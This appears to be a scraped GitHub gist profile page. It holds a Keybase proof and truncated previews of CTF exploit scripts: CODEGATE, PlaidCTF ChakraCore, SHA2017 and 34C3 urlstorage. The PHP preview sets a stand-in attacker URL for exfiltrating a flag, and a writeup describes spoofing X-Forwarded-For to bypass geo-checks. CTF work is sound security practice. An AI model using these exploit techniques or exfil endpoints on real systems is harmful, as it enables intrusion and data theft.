Edgar Boda-Majer eboda

View keybase.md

Keybase proof

I hereby claim:

  • I am eboda on github.
  • I am eboda (https://keybase.io/eboda) on keybase.
  • I have a public key whose fingerprint is F8B6 1392 DBFC 9B65 EB8C 4955 EBE1 91C1 FFBD 546A

To claim this, I am signing this object:

@eboda
eboda / split.sh
Created Nov 12, 2014
diff splitter
View split.sh
#!/bin/sh
# Quote "$1" so that paths containing spaces or glob characters are handled correctly.
sed '/^-/d' "$1" | sed -e 's/^+/ /g' > "$1.after"
sed '/^+/d' "$1" | sed -e 's/^-/ /g' > "$1.before"
@eboda
eboda / exploit.py
Created Mar 17, 2015
codegate ctf BOOKSTORE exploit
View exploit.py
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
    print "=== local exploit"
View template.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
View ropbaby.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / go.py
Created Dec 29, 2016
hohoho solution
View go.py
import sys
m = {
    '0' : '$[$?/$$]',
    '1' : '$?',
    '2' : '$[$?+$?]',
    '3' : '$[$?+$?+$?]',
    '4' : '$[$?+$?+$?+$?]',
    '5' : '$[$?+$?+$?+$?+$?]',
    '6' : '$[($?+$?+$?)*($?+$?)]',
@eboda
eboda / exploit.js
Last active Sep 15, 2019
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
View exploit.js
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / pwn.py
Last active Jun 11, 2017
SHA2017 crypto writeup
View pwn.py
import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
    rgb = []
    flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
    for i in range(20, 480, 40):
        rgb.append(pixel(flag, i))
@eboda
eboda / sha2017.md
Created Jun 11, 2017
SHA2017 web100 writeup
View sha2017.md

SHA2017 web100

Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country-to-IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doing it 12 times, it would return the flag.

@eboda
eboda / exploit.php
Last active Dec 29, 2017
34C3 CTF urlstorage exploit
View exploit.php
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
    $res = '';
    for ($i = 0; $i < strlen($s); $i++) {
        $res .= '\\' . dechex(ord($s[$i]));
    }